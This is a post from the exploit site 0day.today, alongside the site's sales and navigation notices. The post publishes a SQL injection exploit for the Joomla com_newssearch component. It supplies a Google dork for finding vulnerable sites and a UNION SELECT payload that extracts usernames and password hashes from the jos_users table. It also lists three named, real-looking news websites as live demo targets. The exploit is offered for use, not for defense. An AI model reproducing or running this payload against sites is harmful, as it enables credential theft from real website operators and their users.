0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Joomla Components com_newssearch SQL Injection Vulnerability
================================================================================ +++++++++++++++++ ++ C L O U D X ++ +++++++++++++++++ ================================================================================ ######## # Exploit Title: Joomla Components com_newssearch SQL Injection Vulnerability # Author: Cloudx # Facebook Profile: www.fb.me/cloudmrx # Web Site : www.tifa-team.com # Category:: webapps # Google Dork: inurl:"com_newssearch" & "cid=" # platform : php # Vendor: None # Download : Search Here > http://extensions.joomla.org/ < # Version: All versions # Security Risk : High # Tested on: [Windows 8 64bit ] ######## ======================== 1)Vulnerability Description 2)Exploit 3)Real.Demo 1)Vulnerability Description =========================== U can inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else. 2)Exploit ========= http://Localhost/{Path}/index.php?option=com_newssearch&type=list§ion=1&cid=-1 Exploit .demo ========= http://www.ainsworthnews.com/index.php?option=com_newssearch&type=list§ion=1&cid=-null+union+select+1,1,group_concat(username,0x3a,password)+from+jos_users--+Cloudx [~] P0c [~] : ============ Vuln file in : http://Localhost/{Path}/index.php?option=com_newssearch&type=list§ion=1&cid=[Number] <<-----| [~] D3m0 [~] : ============= http://www.ainsworthnews.com/index.php?option=com_newssearch&type=list§ion=1&cid=25[Inj3ct Here] http://www.hebronjournalregister.com/index.php?option=com_newssearch&type=list§ion=1&cid=22[Inj3ct Here] http://www.wpnews.com/index.php?option=com_newssearch&type=list§ion=1&cid=28[Inj3ct Here] Many Websites are Affected On SQL inJection . . . #### =================================**TIFA-Team**=============================================== # Greets To : TIFA-Team & Palestine <3 & Syria <3 & Dr.Freedom & **All Muslims** TIFA --> T = This , I = Is , F = For , A = Allah ============================================================================================== # 0day.today [2024-07-07] #